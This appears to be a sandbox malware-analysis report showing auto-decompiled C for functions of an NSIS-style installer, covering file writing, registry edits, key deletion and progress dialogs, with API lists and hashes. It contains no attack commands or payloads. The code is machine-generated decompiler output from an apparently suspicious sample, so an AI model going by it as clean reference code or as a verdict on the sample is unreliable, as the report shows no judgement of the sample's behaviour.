                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                  • String ID:
                  • API String ID: 2320649405-0
                  • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                  • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                  • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                  • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040266E Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                  0x0040266e
                  0x00402670
                  0x0040267c
                  0x0040267f
                  0x00402689
                  0x0040268d
                  0x0040268d
                  0x00402693
                  0x004026a0
                  0x004026a8
                  0x004026ab
                  0x004026b1
                  0x004026bf
                  0x004026c4
                  0x004026c8
                  0x004026cb
                  0x004026d4
                  0x004026e0
                  0x004026e4
                  0x004026e7
                  0x004026f1
                  0x00402710
                  0x004026f8
                  0x004026fd
                  0x00402705
                  0x00402708
                  0x0040270d
                  0x0040270d
                  0x00402717
                  0x00402717
                  0x00402729
                  0x00402730
                  0x00402742
                  0x00402742
                  0x00402748
                  0x00402748
                  0x00402753
                  0x00402754
                  0x00402758
                  0x0040275c
                  0x00402762
                  0x00402762
                  0x00402769
                  0x00402156
                  0x00402880
                  0x0040288c

                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                  • GlobalFree.KERNEL32 ref: 00402717
                  • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                  • GlobalFree.KERNEL32 ref: 00402730
                  • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                  • String ID:
                  • API String ID: 3294113728-0
                  • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                  • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                  • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                  • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404E23 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                  0x00404e29
                  0x00404e35
                  0x00404e38
                  0x00404e3e
                  0x00404e4a
                  0x00404e4d
                  0x00404e50
                  0x00404e56
                  0x00404e56
                  0x00404e5c
                  0x00404e64
                  0x00404e67
                  0x00404e84
                  0x00404e88
                  0x00404e91
                  0x00404e91
                  0x00404e9b
                  0x00404ea4
                  0x00404eb0
                  0x00404eb7
                  0x00404ebb
                  0x00404ebe
                  0x00404ed1
                  0x00404edf
                  0x00404edf
                  0x00404ee3
                  0x00404ee5
                  0x00404ee8
                  0x00000000
                  0x00404ee8
                  0x00404e69
                  0x00404e71
                  0x00404e79
                  0x00404e7f
                  0x00000000
                  0x00404e7f
                  0x00404e79
                  0x00404e67
                  0x00404ef2

                  APIs
                  • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                  • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                  • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                  • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                  • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                  • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                  • String ID:
                  • API String ID: 2531174081-0
                  • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                  • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                  • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                  • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004046F2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                  0x00404700
                  0x0040470d
                  0x00404713
                  0x00404751
                  0x00404751
                  0x00404760
                  0x00404767
                  0x00000000
                  0x00404769
                  0x00404715
                  0x00404724
                  0x0040472c
                  0x0040472f
                  0x00404741
                  0x00404747
                  0x0040474e
                  0x00000000
                  0x0040474e
                  0x00000000

                  APIs
                  • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
                  • GetMessagePos.USER32 ref: 00404715
                  • ScreenToClient.USER32 ref: 0040472F
                  • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
                  • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Message$Send$ClientScreen
                  • String ID: f
                  • API String ID: 41195575-1993550816
                  • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                  • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                  • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                  • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402B2D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                  0x00402b3a
                  0x00402b48
                  0x00402b4e
                  0x00402b4e
                  0x00402b5c
                  0x00402b5e
                  0x00402b6a
                  0x00402b6f
                  0x00402b71
                  0x00402b71
                  0x00402b7c
                  0x00402b8c
                  0x00402b9e
                  0x00402b9e
                  0x00402ba6

                  APIs
                  • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                  • wsprintfA.USER32 ref: 00402B7C
                  • SetWindowTextA.USER32(?,?), ref: 00402B8C
                  • SetDlgItemTextA.USER32 ref: 00402B9E
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Text$ItemTimerWindowwsprintf
                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                  • API String ID: 1451636040-1158693248
                  • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                  • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                  • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                  • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004022F5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 90%
                  			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}










                  0x004022f6
                  0x004022fb
                  0x00402305
                  0x0040230f
                  0x00402312
                  0x00402322
                  0x0040232c
                  0x00402333
                  0x0040233b
                  0x00402349
                  0x0040234d
                  0x00402358
                  0x00402358
                  0x0040235c
                  0x00402360
                  0x00402366
                  0x0040236b
                  0x0040236b
                  0x0040236f
                  0x0040237b
                  0x0040237b
                  0x00402394
                  0x00402396
                  0x00402396
                  0x00402399
                  0x0040246f
                  0x0040246f
                  0x00402880
                  0x0040288c

                  APIs
                  • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
                  • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg69F4.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
                  • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsg69F4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
                  • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsg69F4.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: CloseCreateValuelstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\nsg69F4.tmp
                  • API String ID: 1356686001-2528760469
                  • Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                  • Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
                  • Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
                  • Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8;
					if( *0x423ea8 == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}







                  0x00402bd1
                  0x00402bd3
                  0x00402bda
                  0x00402bdd
                  0x00402bdd
                  0x00402be3
                  0x00000000
                  0x00402be3
                  0x00402beb
                  0x00402bf1
                  0x00000000
                  0x00402bf4
                  0x00402bfb
                  0x00402c01
                  0x00402c07
                  0x00402c09
                  0x00402c0f
                  0x00402c4d
                  0x00402c53
                  0x00000000
                  0x00402c53
                  0x00402c11
                  0x00402c18
                  0x00402c29
                  0x00000000
                  0x00402c37
                  0x00402c18
                  0x00402c5a

                  APIs
                  • DestroyWindow.USER32(00000000,00000000), ref: 00402BDD
                  • GetTickCount.KERNEL32 ref: 00402BFB
                  • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                    • Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,00001531), ref: 00402BBE
                  • wsprintfA.USER32 ref: 00402C29
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                  • String ID: ... %d%%
                  • API String ID: 632923820-2449383134
                  • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                  • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                  • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                  • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402A28 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E00402A28(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423f50 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A28(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						if( *0x423f50 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}








                  0x00402a49
                  0x00402a51
                  0x00402a79
                  0x00402a63
                  0x00402ab3
                  0x00402ab9
                  0x00000000
                  0x00402abb
                  0x00402a77
                  0x00000000
                  0x00000000
                  0x00402a77
                  0x00402a8e
                  0x00402a96
                  0x00402a9d
                  0x00402ac9
                  0x00000000
                  0x00000000
                  0x00402ad1
                  0x00402ad9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402ad9
                  0x00000000
                  0x00402aac
                  0x00402ac0

                  APIs
                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A49
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                  • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                  • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                  Memory Dump Source
                  • Source File: 00000000.00000002.351761699.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.351737055.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351795030.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351815930.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351857358.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351889394.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.351940694.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_kVijllv0Yl.jbxd
                  Similarity
                  • API ID: Close$DeleteEnumOpen
                  • String ID:
                  • API String ID: 1912718029-0
                  • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                  • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                  • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                  • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                  0x00401ccb
                  0x00401cd2
                  0x00401d01
                  0x00401d09
                  0x00401d10
                  0x00401d10
                  0x00402880
                  0x0040288c

                  APIs
                  • GetDlgItem.USER32 ref: 00401CC5
                  • GetClientRect.USER32 ref: 00401CD2
                  • LoadImageA.USER32 ref: 00401CF3
                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
